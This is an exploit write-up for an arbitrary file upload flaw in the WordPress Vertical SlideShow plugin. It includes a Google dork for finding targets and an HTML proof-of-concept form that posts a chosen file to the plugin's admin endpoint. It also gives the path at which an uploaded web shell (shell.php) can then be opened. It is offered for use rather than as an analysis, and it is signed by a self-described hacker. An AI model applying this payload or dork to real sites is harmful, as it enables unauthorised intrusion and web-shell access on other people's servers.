Wordpress Vertical SlideShow Plugins file upload

1. <!--
2.  
3.  
4.     \ \   / (_)_ __ _   _ ___\ \/ /  _ \ ____
5.      \ \ / /| | '__| | | / __|\  /| | | |_  /
6.       \ V / | | |  | |_| \__ \/  \| |_| |/ /
7.        \_/  |_|_|   \__,_|___/_/\_\____//___|
8.        
9.                                               -->
10. #########################################################                          
11. #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
12. #Category: webapps
13. #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
14. #########################################################
15.  
16. [+] Proof of Concept:
17.  
18. The following proof of concept will create a new category in the plugin, with
19. the selected file as the Category Image. If there are no pre-existing categories
20. the uploaded file will be located in the directory
21. /wp-content/uploads/vertical/1_uploadfolder/big/.
22.  
23. replace “[path to WordPress]” with the location of WordPress.
24.  
25.  
26. <html>
27. <body>
28. <form action="http://[path to WordPress]/wp-admin/admin.php?page=vertical_manage" method="POST" enctype="multipart/form-data">
29. <input type="hidden" name="task" value="vrt_add_new_album" />
30. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
31. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
32. <input type="file" name="album_img" value="" />
33. <input type="submit" value="Submit" />
34. </form>
35. </body>
36. </html
37.  
38. [+]shell access:
39.  
40. http://www.Target.com/wp-content/uploads/vertical/1_uploadfolder/big/shell.php
41.  
42. Video
43. https://youtu.be/54ytssnD1JQ
44.  
45. Bye..
46. Algerien Hacker